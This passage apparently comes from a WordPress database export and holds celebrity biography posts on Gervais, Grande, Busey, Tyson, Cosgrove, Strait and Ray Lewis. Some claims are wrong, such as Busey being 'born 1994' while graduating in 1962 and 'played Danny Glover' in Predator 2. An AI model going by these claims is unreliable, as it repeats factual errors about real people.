Iglesias','','inherit','open','open','','enrique-iglesias','','','2015-06-24 14:38:00','2015-06-24 14:38:00','',22,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Enrique-Iglesias.jpg',0,'attachment','image/jpeg',0),(25,2,'2015-06-24 14:42:33','2015-06-24 14:42:33','','logo','','inherit','open','open','','logo','','','2015-06-24 14:42:33','2015-06-24 14:42:33','',0,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/logo.png',0,'attachment','image/png',0),(26,2,'2015-06-24 15:28:43','2015-06-24 15:28:43','','ad-160x600','','inherit','open','open','','ad-160x600','','','2015-06-24 15:28:43','2015-06-24 15:28:43','',0,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/ad-160x600.jpg',0,'attachment','image/jpeg',0),(27,2,'2015-06-24 15:28:44','2015-06-24 15:28:44','','ad-300x250','','inherit','open','open','','ad-300x250','','','2015-06-24 15:28:44','2015-06-24 15:28:44','',0,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/ad-300x250.jpg',0,'attachment','image/jpeg',0),(28,2,'2015-06-24 15:28:45','2015-06-24 15:28:45','','ad-728x90','','inherit','open','open','','ad-728x90','','','2015-06-24 15:28:45','2015-06-24 15:28:45','',0,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/ad-728x90.jpg',0,'attachment','image/jpeg',0),(38,2,'2015-06-24 19:40:05','2015-06-24 19:40:05','','logo','','inherit','open','open','','logo-2','','','2015-06-24 19:40:05','2015-06-24 19:40:05','',0,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/logo1.png',0,'attachment','image/png',0),(39,2,'2015-06-24 19:40:17','2015-06-24 19:40:17','','logo-footer','','inherit','open','open','','logo-footer','','','2015-06-24 19:40:17','2015-06-24 19:40:17','',0,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/logo-footer.png',0,'attachment','image/png',0),(40,2,'2015-06-25 09:18:04','2015-06-25 09:18:04','<h2>In the Beginning</h2>\r\nRicky Gervais was born June 25, 1961. His birthplace was Reading, Berkshire. His father was Lawrence Raymond Gervais and his mother, Eva Sophia. Eva Sophia was of English descents while Ricky’s father worked as a laborer and hod carrier. Gervais studied at the Ashmead Comprehensive School and went on to the University College in London where he received a degree in Philosophy.\r\n\r\nGervais first started to pursue a pop career through Seona Dancing. It was a duo he formed with another student. The duo performed as a synth-pop act that was similar to many groups in the 1980s. Their unique name and the strong influence of the music by David Bowie helped them to stand out. Gervais’ vocal ability was even compared to David Bowie.\r\n\r\nSeona Dancing did sign a contract where they recorded and released two singles “Bitter Heart” and “More to Lose”. The act failed to reach the United Kingdom’s Top 75. Despite the setback, Gervais continued his career in music. He even became the manager of Suede at one point.\r\n<h2>Career Accomplishments</h2>\r\nGervais had to bide his time for the success that would come later come for his career in the music industry. During the 1990s, Gervais struck up a writing partnership with Stephen Merchant. When 2000 rolled around, he snagged his comedy chat show called Meet Ricky Gervais, on <a href=\"http://www.channel4.com/programmes/the-ricky-gervais-show\" target=\"_blank\">Channel 4</a>. Famous guests like Midge Ure, Jimmy Savile, Stefanie Powers Jim Bowen, Michael Winner, Peter Purves, and Paul Daniels appeared on the show. There were only six episodes of the comedy show.\r\n<h2>Most Known For</h2>\r\nGervais struck gold once again with another comedy show, <a href=\"http://www.nbc.com/the-office\" target=\"_blank\">The Office</a>, when it made its debut on the BBC in 2001. The Office had a rocky start, but has come to be recognized as reinventing the sitcom genre. The Office has also been called one of the best comedy show series of all time. Gervais played the role as the embarrassing and obnoxious manager on the show David Brent. On polls, the character was voted as one of the best comedic characters. An American remake of The Office rolled out in 2005. During that same year, Gervais pursued another sitcom called Extras. He attracted several celebrity guests like Samuel L. Jackson, David Bowie, and Ben Stiller. Extras became known as the satire of the entertainment industry.\r\n\r\nGervais has become a widely popular comedy performer well into the 21<sup>st</sup> industry. He has hosted the Golden Globe awards. He’s shown up on a host of talk shows, lent his talent to films, became a voice artist, and has even become a well-known British comedy figure in America.\r\n<h2>Current Personal Life</h2>\r\nGervais is currently living in Hampstead after moving from Bloomsbury. He moved with his partner, Jane Fallon, whom he’s been with for 32 years. Jane is an author and producer. The couple has decided not to have children or to marry. Gervais does own a cat named Ollie who was a gift to him from Jonathan Ross.\r\n\r\nGervais <a href=\"http://www.dailymail.co.uk/tvshowbiz/article-2102754/Ricky-Gervais-slams-homophobic-parents-making-anti-gay-comments-youngsters-calling-child-abusers.html\" target=\"_blank\">supports gay rights</a> and has praised the introduction of same-sex Marriage in England and Wales. Gervais himself is a humanist and atheist. He abandoned Christianity when he was eight years old. During the 2010 year in December, he wrote an editorial for The Wall Street Journal on defending his atheism. He is also a patron of the British Humanist Association.\r\n<h2>Where Are They Now</h2>\r\nGervais joined the social media site Twitter in 2009 when he got to host the 66<sup>th</sup> Golden Globes for the first time. He had gone on a two-year hiatus before he returned in September of 2011. Gervais won the Shorty Award in 2012 for the Lifetime Achievement due to his fame in social media. Currently on March 2015 he is being followed by 7 million fans he has started calling “Twonks.”\r\n\r\nThe main use of his social media is to promote the work he does to his fans. Gervais has even brought back his Brent character for his new Youtube channel series called <em>Learn Guitar with David Brent</em>.\r\n\r\nGervais has also been using social media to raise the awareness of animal welfare. He will tweet links for the petitions to rescue animals from captivity. He shows the plight animals go through for testing and encourages people to adopt rather than buy from breeders. Gervais even won the Genesis Award from the <a href=\"http://www.hsi.org/news/press_releases/2015/06/ricky-gervais-hsi-dog-meat-061515.html?referrer=https://www.google.com.ar/\" target=\"_blank\">Human Society</a> for the 2015 year in March.\r\n\r\n[<a href=\"https://www.flickr.com/photos/flashback/2255808727/sizes/o/\" target=\"_blank\">Image</a>]','Ricky Gervais','','publish','open','open','','ricky-gervais-tv-actor','','','2015-10-14 18:13:57','2015-10-14 18:13:57','',0,'http://birthdaypedia.wpengine.com/?p=40',0,'post','',0),(42,2,'2015-06-26 09:36:00','2015-06-26 09:36:00','<h2>In the Beginning</h2>\r\nAriana Grande was born June 26, 1993. She was born in <a href=\"https://en.wikipedia.org/wiki/Boca_Raton,_Florida\" target=\"_blank\">Boca Raton, Florida</a>. Ariana Grande started her career on stage from an early age. She had a role on Broadway when she was only 15 years old, and won a National Youth Theatre Association Award. She even had a few small TV roles and even played as Cat on the TV series <em>Victorious</em>. She got a spinoff later in <em>Sam & Cat</em>. After this good beginning in acting she leapt right into her music career. She came out with two albums, <em>My Everything</em> coming out as No. 1.\r\n\r\nAriana’s father was a graphic designer while her mother was a CEO. Two years after she received the award she appeared in the musical <em>Cuba Libre</em>. She also had a small role in the TV show <em>The Battery’s Down</em>.\r\n<h2>Career Accomplishments</h2>\r\nNickelodeon’s <em>Victorious</em> is perhaps what gave Grande the boost into fame that she needed. During the show, Grande still pursued her musical career. Her first contribution to the music industry came appeared in the soundtrack for <em>Victorious</em>. Grande released her single “Put Your Hearts Up” in 2011. The pop song was for the audience of <em>Victorious</em>. The series was even voted as the Favorite TV Show for the 2012 Kids’ Choice Awards.\r\n\r\n<em><a href=\"http://www.nick.com/victorious/\" target=\"_blank\">Victorious</a> </em>stopped airing in 2012. Grande at the time was playing the character Cat Valentine on the show. Later a new Nick show was made that was a spin-off called <em>Sam & Cat</em>. <em>iCarly’s</em> Jennette McCurdy also co-starred in the show, but rumors went around that Grande did not like the experience. After 35 episodes, the series ended in 2014. Grande came out with another single in 2013 called “The Way” that made it to the top 10 in the United States. Even hitting triple platinum, and thus paving the way for her future.\r\n<h2>Most Known For</h2>\r\n“The Way” is a single from the debut album, <em>Yours Truly</em>, which came from Grande. The record also features other hits “<a href=\"http://www.axs.com/news/ariana-grande-chases-her-romeo-in-right-there-video-featuring-big-sean-18741\" target=\"_blank\">Right There</a>” and “Baby I”. Grande began to mature in her music. She had a 2014 release of <em>My Everything</em> that in the first week sold 169,000 copies alone and came out as No. 1. The single “Problem” also featured Iggy Azalea, an Austrailian rapper. The single reached the No. 3 spot on Billboard Hot 100, and sold over 400,000 when it was released.\r\n\r\nGrande teamed up with Nicki Minaj and Jessie J in the summer of 2014. The did a single called “Bang Bang” that came out at No. 6 and rocketed up to the No. 3 spot in the United States.\r\n<h2>Current Personal Life</h2>\r\nGrande is currently in a relationship with Jai Brooks who’s a member of the group The Janoskians. Grande did date Nathan Sykes in August of 2013 to December. In May of the 2014 year however she was together with Brooks once again. Three months passed before she split up with him a second time and started dating Big Sean the rapper. The relationship ended eight months later in April of 2015.\r\n\r\nGrande was raised Roman Catholic, but abandoned the religion. Grande turned away from the religion during the reign of Pope Benedict, and also because the opposition the church had against gay marriage. As Grande stated:\r\n\r\n“I lost faith when the Pope decided to tell me that everything I loved and believed in was wrong. I needed something else to believe in.”\r\n\r\nEver since she was 12, she started to follow the <a href=\"http://kabbalah.com/what-kabbalah\" target=\"_blank\">Kabbalah</a> teachings instead.\r\n<h2>Where Are They Now</h2>\r\nGrande is not always recording songs. In her spare time, she gets involved with Kids Who Care. The group raises money for the charities in South Florida. Grande has also become a strong online presence, and the Huffington Post even has her listed as the third most influential actress online. On her Twitter alone she has 21 million followers, and she has 23 million Facebook likes. On her Youtube, she has hundreds of millions of views.\r\n\r\nImage credit: istockphoto.com\r\n\r\n ','Ariana Grande','','publish','open','open','','ariana-grande-pop-singer','','','2015-10-14 18:18:33','2015-10-14 18:18:33','',0,'http://birthdaypedia.wpengine.com/?p=42',0,'post','',0),(43,2,'2015-06-29 08:44:20','2015-06-29 08:44:20','<h2>In the Beginning</h2>\r\nGary Busey was born on June 29, 1994, in Goose Creek, Texas. However, he grew up in Oklahoma. His parents were Delmar Lloyd, who worked as a construction worker and Sadie Virginia, who was a homemaker. Busey graduated in 1962 from the Nathan Hale High School in Tulsa, Oklahoma. He did start out as a professional musician and was a talented drummer. He played in a couple of bands with a few legends such as Willie Nelson, Leon Russell, and Kris Kristofferson.\r\n<h2>Career Accomplishments</h2>\r\nBusey made his firm film appearance in a low-budget film called “<a href=\"https://en.wikipedia.org/wiki/Angels_Hard_as_They_Come\" target=\"_blank\">Angels Hard as They Come</a>” that came out in 1971. As the years went by Busey continued to land film roles. Usually starring as characters that were rebellious, country hicks or rednecks, or surly. Busey didn’t get his first real chance for fame until he played the lead role as Buddy Holly in the movie “The Buddy Holly Story” in 1978. Not only did Busey show off his talent for guitar, but also his singing vocals too.\r\n\r\nDue to his excellent performance he received a Best Actor Nomination. This got the attention of Hollywood overcasting agents to pay attention to Busey. He did join up with a couple of younger actors Jan-Michael Vincent and William Katt. They played a group of friends who surfed and grew up together in the film “Big Wednesday” aired in 1978.\r\n\r\nUnfortunately, Busey did go through a period where he appeared in mediocre films that took him away from the center stage for a few years.\r\n<h2>Most Known For</h2>\r\nBusey got to play a brutal assassin named <a href=\"http://www.imdb.com/title/tt0093409/fullcredits?ref_=tt_ov_st_sm\" target=\"_blank\">Mr. Joshua</a> in “Lethal Weapon” which came out in 1987. He was able to get stronger roles and played Danny Glover in “Predator 2” that came out in 1990. Busey also starred in another movie “Point Break” in 1991. Busey did an amazing performance as a crazy Navy Officer, who was conspiring with terrorists in the popular film “Under Siege” that came out in 1992.\r\n<h2>Current Personal Life</h2>\r\nThe wife of Busey, Judy Helkenberg, gave birth to their son William Jacob “Jake” Busey in 1971. When Jake was 19 years old, the Judy and Busey divorced. <a href=\"http://www.nydailynews.com/entertainment/gossip/gary-busey-strikes-pedestrian-malibu-car-accident-article-1.2115118\" target=\"_blank\">Busey</a> also has a daughter called Alectra who comes from a past relationship. Busey’s fiancée, Steffanie Sampson, gave birth to their son Luke Sampson Busey in February 2010.\r\n\r\nBusey suffered a severe motorcycle accident on December 4, 1988. He was not wearing a helmet at the time and suffered a fractured skull. There was a real fear that Busey could suffer permanent brain damage due to his injury. While filming <em>Celebrity Rehab </em>during its second season in 2008, Busey had been referred to the psychiatrist Dr. Charles Sophy. Sophy has suspicions the brain injury had a bigger effect on Busey than he first realized. Busey described it as his mental “filters” weakening. This caused him to act and speak impulsively. Sophy soon recommended Busey take some valproic acid to help, and Busey agreed.\r\n\r\nBusey announced to the public he was Christian in 1996 stating: \"I am proud to tell Hollywood I am a Christian. For the first time, I am now free to be myself.\"\r\n\r\nIn 1997, Busey kept having recurring nosebleeds. He had to undergo surgery and had a cancerous tumor the size of a golf ball removed from his sinus cavity. After the surgery, he had to undergo radiation therapy.\r\n<h2>Where Are They Now</h2>\r\nBusey has continued to maintain a strong presence in front of the cameras despite his setbacks. A minor cult has even been formed amongst his film fans. Busey is also the proud father of the talented actor <a href=\"http://www.fandango.com/jakebusey/filmography/p9845\" target=\"_blank\">Jake Busey</a>.\r\n\r\n[<a href=\"https://www.flickr.com/photos/43492742@N00/2254720682/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Gary Busey','','publish','open','open','','gary-busey-actor','','','2015-10-14 18:19:18','2015-10-14 18:19:18','',0,'http://birthdaypedia.wpengine.com/?p=43',0,'post','',0),(44,2,'2015-06-30 09:01:40','2015-06-30 09:01:40','<h2>In the Beginning</h2>\r\nMike Tyson was born June 30, 1966, in <a href=\"http://www.imdb.com/search/name?birth_place=Brooklyn,+New+York,+USA&\" target=\"_blank\">Brooklyn</a>, New York. He has an older brother named Rodney, who was born in 1961. He also has an older sister named Denise, who passed away due to a heart attack in 1990. She was only 24 years old.\r\n\r\nOn Mike Tyson’s birth certificate, his biological father is listed as “Purcell Tyson”. Mike Tyson knew another man as his father though who was Jimmy Kirkpatrick. Kirkpatrick was one of the top baseball players in the neighborhood. Kirkpatrick married and had Tyson’s half-brother Jimmie Lee Kirkpatrick. Jimmie later helped to integrate football in Charlotte High school in 1965. Later Kirkpatrick decided to leave his family and moved down to Brooklyn. There he met Lornae Mae (Smith) Tyson and soon after Mike Tyson was born. Kirkpatrick was known for hanging out in the streets, gambling, and hanging out at pool halls. Near the time, Mike Tyson was born Kirkpatrick abandoned the family.\r\n\r\nDuring his childhood, Tyson had to live in high-crime neighborhoods. In an interview with <em>Details</em>, Tyson got into his first fight with a youth bigger than him. The bigger youth had ripped off the head of one of the pigeons Tyson owned. Tyson was also caught fighting and committing petty crime. He was ridiculed for having a lisp and high pitched voice. When he was only 13 years old, Tyson had already been caught and arrested 38 times.\r\n\r\nEventually, <a href=\"http://www.nndb.com/people/257/000023188/\" target=\"_blank\">Mike Tyson</a> landed in the Tyron School for Boys in Johnstown, New York. Tyson’s boxing ability was discovered by Bobby Stewart, who was the juvenile detention center counselor and also a former boxer himself. Stewart trained Tyson and thought him to be a talented fighter. Stewart had trained Tyson for a few months before he introduced him to Cus D’Amato. Tyson dropped out of high school during his senior year. He was awarded an honorary <a href=\"http://www.nytimes.com/1989/04/25/sports/sports-people-boxing-a-doctorate-for-tyson.html\" target=\"_blank\">Doctorate of Human Letters</a> from the Central State University in 1989.\r\n\r\nAt the age of 20 Mike Tyson became the youngest heavyweight boxing champion in the world in 1986. He lost the title though when he served three years in prison due to rape charges in 1990. Tyson also bit off Evander Holyfield’s ear off during their rematch in 1997.\r\n<h2>Career Accomplishments</h2>\r\nTyson made his professional debut on March 6, 1985, in Albany, New York. He faced off against Hector Mercedes, and at only 18 years old knocked Mercedes out. Tyson’s defensive abilities and his ability to knock out opponents in just one round even earned him the nickname “Iron Mike.”\r\n\r\nTyson had a record of 22-0 by 1986. He won 21 of the fights by knockout alone. On November 22, 1986, he reached his goal of getting his first ever title fight against Trevor Berbick for the World Boxing Council heavyweight Championship. Tyson won the title in the second round by knockout.\r\n\r\nTyson went on to defend his title on March 7, 1987, against James Smith. Tyson had the World Boxing Association championship underneath his belt. He also became the first heavyweight who owned all three major boxing belts on August 1<sup>st</sup>. Tyson also won the International Boxing Federation title from Tony Tucker.\r\n<h2>Most Known For</h2>\r\nTyson stepped into the ring once again to go up against British boxer Frank Bruno so he could keep his title for the world heavyweight. Tyson knocked out Bruno during the fifth round. He had to defend his title again on July 21, 1989, against Carl “The Truth” William. Tyson knocked William out in the first round. Tyson’s winning streak continued until it stopped on February 11, 1990. He lost the championship belt to Buster Douglas in Tokyo, Japan. Tyson was the favorite and was able to send Douglas to the mat during the eighth round. Douglas came back strong in the tenth round and knocked Tyson out for the first time in the boxer’s career.\r\n\r\nTyson jumped back by knocking out Henry Tillman, an Olympic gold medalist, later that same year. He also defeated Alex Stewart in their first round with a knockout.\r\n\r\nTyson won another fight against Peter McNeeley on August 19, 1995, by knocking him out with just 89 seconds into the fight. Tyson won another match against Buster Mathis Jr. in 1995 by knockout during the third round.\r\n\r\nTyson decided to go against Evander Holyfield. The two faced off on November 9, 1996, for the heavyweight title. Unfortunately, Tyson lost against Holyfield in the 11<sup>th</sup> round by knockout. Holyfield then became the second person after Tyson to win the heavyweight championship belt three times.\r\n\r\nTyson trained for their rematch on June 28, 1997. Nearly 2 million households watched the fight on pay-per-view. The boxers received the record for purses for the match. This made them the highest paid professional boxers in history all the way until 2007. The first and second rounds of the match were crowd pleasers. However, in the third round Tyson bit both of Holyfield’s ears. Tyson was then disqualified from the match by the judges.\r\n\r\nTyson didn’t have another highly publicized fight until 2002 against the IBO, WBC, and IBC champion Lennox Lewis. Tyson was fighting for the heavyweight championship once more. Tyson ended up losing the fight by knockout. After the defeat, there was a decline in Tyson’s career. He lost several more fights in 2003 and 2005. Afterward he announced his retirement from the ring.\r\n<h2>Current Personal Life</h2>\r\nTyson not only suffered in the ring, but his personal life took a nosedive too. His wife of six years, Monica Turner, filed for a divorce in 2003. The divorce was filed on the ground of adultery. Tyson ended up filing for bankruptcy that same year due to his spending habits. He faced bad investments and multiple trials. Tyson tried to pay off the debts by stepping into the ring again for exhibition fights.\r\n\r\nTyson even sold his mansion in Farmington, Connecticut to the rapper 50 Cent for $4 million to deal with expenses. Tyson slept in shelters and on friend’s couches until he ended up Phoenix, Arizona. He purchased a home in Paradise Valley for $2.1 million in 2005. He was able to finance the home by making TV cameos, doing boxing exhibitions, and endorsing products.\r\n\r\nTyson’s pension of partying hard caught to him once more late in the year of 2006. He got arrested in Scottsdale, Arizona when he almost crashed into a police SUV. Police suspected Tyson of driving under the influence and searched his car. The police discovered drugs and even cocaine. Mike Tyson plead guilty to possession of narcotics and driving under the influence on September 24, 2007.\r\n\r\nTyson’s life did start to mellow out for a couple of years. He attended Narcotics Anonymous and Alcoholics Anonymous meetings. In 2009, his four year old daughter Exodus accidentally strangled herself on the treadmill cord at her mother’s Phoenix home. This was a big blow for Tyson and spelled a dark period for his already troubled life.\r\n\r\nTysons is known for having seven children: Exodus, Gena, Miguel Leon, Rayna, Mikey Lorna, Amir, D’Amato Kilrain. From multiple women and some of them who have remained anonymous to the media even today.\r\n<h2>Where Are They Now</h2>\r\nTyson came back to the spotlight in 2009 when he made a cameo in the comedy <em>The Hangover</em>. He married a third time that same year to Lakiha “Kiki” Spicer. The two have children, a son Morocco and a daughter named Milan.\r\n\r\nDue to the success of his appearance in <em>The Hangover</em>, it helped to open a door to acting opportunities for him. He has made guest appearances in other television serious <em>Law & Order: Special Victims Unit, Entourage, </em>and <em>How I Met Your Mother.</em>\r\n\r\nTyson even made a Broadway debut in 2012 with his one-man show <em>Mike Tyson: The Undisputed Truth</em>. Tyson admits he had been having issues with substance abuse the following year. Tyson revealed in an interview with <em>Today</em> in August 2013 that:\r\n\r\n“When I start drinking, and I relapse, I think of dying. When I\'m in a real dark mood, I think of dying. And I don\'t want to be around no more. I won\'t survive unless I get help.”\r\n\r\nTyson had the revelation during his time reinventing himself as a boxing promoter. Prior to the interview, Tyson also told Laura he had only been sober for 12 days.\r\n\r\nTyson had an animated feature come out called <em><a href=\"http://www.adultswim.com/videos/mike-tyson-mysteries/mike-tyson-mysteries-coming-this-fall/\" target=\"_blank\">Mike Tyson Mysteries</a></em> in October 2014.\r\n\r\nImage credit: istockphoto.com\r\n\r\n ','Mike Tyson','','publish','open','open','','mike-tyson-boxer','','','2015-10-14 18:20:00','2015-10-14 18:20:00','',0,'http://birthdaypedia.wpengine.com/?p=44',0,'post','',0),(45,2,'2015-05-14 10:12:51','2015-05-14 10:12:51','<h2>In the Beginning</h2>\r\n<a href=\"http://www.tmz.com/person/miranda-cosgrove/\" target=\"_blank\">Miranda Cosgrove</a> was born in Los Angeles, California to Tom and Chris Cosgrove. She was discovered by a talent agent while singing and dancing at a Taste of L.A. when she was only three years old! Following the discovery she began to model as well as appeared in commercials for both McDonalds and Mellow Yellow. Her first appearance in a television show was as the voice of young Lana Lang in the pilot for <em>Smallville </em>in 2001. In 2003, she played a role in the movie <em>School of Rock. </em>\r\n<h2>Career Accomplishments</h2>\r\nCosgrove has starred in two television shows, <em>Drake & Josh </em>and <em><a href=\"http://www.icarly.com/\" target=\"_blank\">iCarly</a>, </em>and is currently slated to star in an NBC sitcom entitled <em>Crowded </em>(2015). She has been in 16 movies, including <em>School of Rock </em>(2003)<em>, Yours, Mine, and Ours </em>(2005)<em>, Keeping Up With the Steins </em>(2006), and <em>Despicable Me </em>(2010) where she voiced the character Margo.\r\n\r\nShe has one album entitled <em>Sparks Fly </em>(2010) that peaked on the Billboard charts at number 8.\r\n<h2>Most Known For</h2>\r\nShe is most known for two roles on television shows, one as Megan Parker on the show <em>Drake & Josh </em>(2004)<em>,</em> and the second as Carly Shae on the show <em>iCarly </em>(2007)<em>. </em>\r\n\r\nMegan Parker was the annoying younger sister of the titled older brothers, Drake and Josh, on the Nickelodeon hit show <em>Drake & Josh. </em>The role gave her the opportunity to form a relationship with Nickelodeon producer Dan Schneider, which led to a few roles including a special guest star role in <em><a href=\"http://scoobydoo.wikia.com/wiki/What\'s_New,_Scooby-Doo%3F\" target=\"_blank\">What’s New, Scooby Doo</a>? </em>and a 5-episode stint on <em>Grounded For Life. </em>\r\n\r\n<em>iCarly </em>is definitely where Cosgrove became most famous. The show allowed the inclusion of audience-submitted videos, and it drew a huge following. The show is about Carly, Sam, and Freddie, three best friends who start a web show and become immensely popular. The theme song of the show is sung by Cosgrove, and this eventually led to her popularity as a singing pop star.\r\n\r\nHer album, <em>Sparks Fly, </em>debuted in 2010 and peaked at number 8 on the Billboard 200 chart. In January 2011 Cosgrove began her first tour, called the <em>Dancing Crazy Tour, </em>where she toured the USA until August 11 when she was involved in an accident that broke her ankle and forced her to cancel the rest of the tour.\r\n<h2>Current Personal Life</h2>\r\nIn the fall of 2012 Cosgrove began attending the University of South California with the intention of majoring in film. She decided on USC so that she could remain close to her family and continue to work in the film industry.\r\n\r\nShe also spends a lot of time doing charity work, including supporting St. Jude Children’s Research Hospital and being the national spokesperson for Light the Night Walk, which is an organization that creates awareness for leukemia and blood cancer.\r\n<h2>Where Are They Now</h2>\r\nCosgrove is attending the University of South California where she is majoring in film. She recently performed voice work in an animated movie <em><a href=\"http://www.moviefone.com/movie/a-mouse-tale/20062592/credits\" target=\"_blank\">A Mouse Tale</a> </em>(2015) and is slated to star in an NBC sitcom called <em>Crowded, </em>which was ordered for series on May 7, 2015.\r\n\r\n[<a href=\"https://www.flickr.com/photos/evarinaldiphotography/8957436989/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Miranda Cosgrove','','publish','open','open','','miranda-cosgrove','','','2015-10-14 15:54:22','2015-10-14 15:54:22','',0,'http://birthdaypedia.wpengine.com/?p=45',0,'post','',0),(46,2,'2015-05-18 10:25:11','2015-05-18 10:25:11','<h2>In the Beginning</h2>\r\n<a href=\"https://en.wikipedia.org/wiki/George_Strait\" target=\"_blank\">George Harvey Strait</a> was born on May 18, 1952 in Poteet, Texas to John Byron Strait, Sr. and Doris Couser. His father was a mathematics teacher who also owned a family cattle ranch outside of Big Wells, Texas. When he was in fourth grade, Strait’s father and mother divorced, and George remained living with his father along with his brother John, Jr.\r\n\r\nStrait’s musical interests began in high school when he played in a garage rock band, which was around the time the Beatles were highly popular. Live music that was popular in Texas soon shifted Strait’s interests to country music, where he was influenced by the likes of Hank Thompson, Hank Williams, Lefty Frizzell, Frank Sinatra, and more.\r\n\r\nMusic became a mainstay in Strait’s life as he entered the US Army and played in an Army sponsored band called “Rambling Country,” and after leaving the military and entering into college at Southwest Texas State University, he joined a band which became known as the Ace in the Hole Band.\r\n<h2>Career Accomplishments</h2>\r\nIn 1981 and 1982 Strait released his first two albums, <em>Strait Country </em>and <em>Strait from the Heart.</em> Both albums had a number of top ten singles, including his very first hit, “Unwound,” which climbed to number 3 on the <a href=\"http://www.billboard.com/biz/charts/hot-country-songs\" target=\"_blank\">Billboard Hot Country Songs</a> of 1981. <em>Strait Country </em>was hailed by critics for bringing back a traditional country sound to a genre that was currently infused with quite a bit of pop.\r\n\r\nIn 1984 and 1986 Strait won the Country Music Awards “Male Vocalist of the Year” award, and in 1989 he won their “Entertainer of the Year” award.\r\n\r\nIn the 1980’s he released nine albums, eight of which were #1 albums. In the 1990’s, Strait released another ten albums, the most popular of which was <em>Pure Country, </em>the soundtrack to a film that Strait starred in in 1992.\r\n\r\nSince the year 2000, Strait has released another 9 albums, creating many singles which topped the charts and show that Strait hasn’t lost his magic touch.\r\n\r\nIn 2009 Strait was honored with the <a href=\"https://www.acmcountry.com/winners\" target=\"_blank\">Academy of Country Music’s</a> “Artist of the Decade” award. Strait is also the only country musician to ever receive the Billboard Touring Award’s “Legend of Live” honor, which goes to the industry’s top artist based on Billboard’s Boxscore chart and box office sales.\r\n<h2>Most Known For</h2>\r\nStrait is potentially the most famous country musician of all time, and is popularly known as the “King of Country.” He is known for his neotraditionalist country style and his cowboy look.\r\n\r\nHe has sold more than 100 million records worldwide, with his bestselling album being <em>Pure Country, </em>which sold 6 million copies.\r\n<h2>Current Personal Life</h2>\r\nGeorge and his wife Norma, married since 1971, have two children. Their daughter, Jenifer, was born in 1972 and died in 1986 in a tragic car accident. Their son George Strait, Jr., also known as “Bubba,” was born in 1981.\r\n\r\nGeorge and his son are interested in roping competitions, and annually host a George Strait Team Roping Classic.\r\n\r\nSince 2010 Strait has been the spokesperson for the Wrangler National Patriot program, which is designed to raise awareness and money for America’s fallen soldiers and their families.\r\n<h2>Where Are They Now</h2>\r\nStrait no longer tours, his last tour was in 2012, but is still recording music, and recently released a new single called “Let it Go.”\r\n\r\nHe lives with his wife in San Antonio on a family ranch. He is a big fan of the <a href=\"http://www.nba.com/spurs/sbc_center/george_strait.html\" target=\"_blank\">San Antonio Spurs</a> and can be often seen courtside cheering on his favorite team.\r\n\r\n[<a href=\"https://www.flickr.com/photos/craigoneal/2395859478/sizes/l\" target=\"_blank\">Image</a>]\r\n\r\n ','George Strait','','publish','open','open','','george-strait','','','2015-10-14 16:28:01','2015-10-14 16:28:01','',0,'http://birthdaypedia.wpengine.com/?p=46',0,'post','',0),(47,2,'2015-05-15 07:32:07','2015-05-15 07:32:07','<h2>In the Beginning</h2>\r\nRay Lewis was born in Bartow, Florida on May 15, 1975. He attended Kathleen High School in Lakeland, Florida, where he was an All-American Linebacker as well as a wrestling star.\r\n\r\nHe enrolled in the University of Miami, where he played on the <a href=\"http://www.hurricanesports.com/SportSelect.dbml?SPID=103763\" target=\"_blank\">Miami Hurricanes football team</a>. As a freshman he worked his way up to become a starter in the Hurricanes’ last five games, and during the season he accrued 81 tackles, 2 sacks, 2 tackles for a loss, and four pass deflections, which led to him being named to the Freshmen All American team.\r\n\r\nHis next two years of college led to two more spots in the All American teams. He finished his junior season with 160 tackles, which was the University of Miami’s second highest in their team’s history.\r\n\r\nAfter his third year at the University of Miami, Lewis decided to enter the NFL Draft and was selected by the Baltimore Ravens, who were entering their first season and picked Lewis 26<sup>th</sup> overall in the first round of the 1996 NFL Draft.\r\n<h2>Career Accomplishments</h2>\r\nRay Lewis remained on the Ravens for his entire NFL career, where he helped lead them to two Super Bowl Wins (<a href=\"http://www.nfl.com/superbowl/history/boxscore/sbxxxv\" target=\"_blank\">Super Bowl XXXV</a> and XLVII). He was named Super Bowl MVP for Super Bowl XXXV.\r\n\r\nHe played in 13 Pro-Bowls between 1997 and 2011, and holds the NFL record for number of Pro-Bowls attended by an Inside/Middle Linebacker.\r\n\r\nHe was selected for 7 First Team All-Pro games, and 3 Second Team All-Pro games, which ties him for the NFL record for All-Pro selections for a Linebacker (he is tied with Lawrence Taylor).\r\n<h2>Most Known For</h2>\r\nOther than being an incredible Linebacker, Lewis was popularized by the media after he was involved in the <a href=\"http://www.usatoday.com/story/sports/nfl/2013/01/10/ray-lewis-baltimore-ravens-atlanta-murder-2000/1566198/\" target=\"_blank\">stabbing deaths</a> of two men, Jacinth Baker and Richard Lollar.\r\n\r\nThe stabbing occurred following a Super Bowl XXXIV party in Atlanta on January 31, 2000. A fight broke out between the Lewis, two of his friends, Reginald Oakley and Joseph Sweeting, and the two deceased. The three men were indicted on murder and aggravated-assault charges.\r\n\r\nLewis’s attorneys, Don Samuel and Ed Garland, negotiated a plea agreement where the murder charges against Lewis were dropped in exchange for his testimony against Oakley and Sweeting. Both Oakley and Sweeting were eventually acquitted of the charges in June 2000.\r\n\r\nLewis was sentenced to 12 months of probation by the courts, where he was not allowed to use any drugs or alcohol. He was also fined $250,000 by the NFL, which was the largest fine levied against a player for an infraction outside of substance abuse.\r\n<h2>Current Personal Life</h2>\r\nLewis is a Christian, and his faith was featured in a 2006 issue of Sports Illustrated.\r\n\r\nHe has six children with four different women; four boys and two girls.\r\n\r\nHe owns a ranch-style property in Reisterstown, Maryland.\r\n<h2>Where Are They Now</h2>\r\nLewis retired in 2013 after his final game was a Super Bowl XLVII victory. Later that year he was taken on by <a href=\"http://espn.go.com/nfl/player/stats/_/id/964/ray-lewis\" target=\"_blank\">ESPN</a> to contribute toward their NFL coverage.\r\n\r\nImage credit: istockphoto.com\r\n\r\n ','Ray Lewis','','publish','open','open','','ray-lewis','','','2015-10-14 15:56:26','2015-10-14 15:56:26','',0,'http://birthdaypedia.wpengine.com/?p=47',0,'post','',0),(48,2,'2015-04-27 09:40:47','2015-04-27 09:40:47','<h2>In the 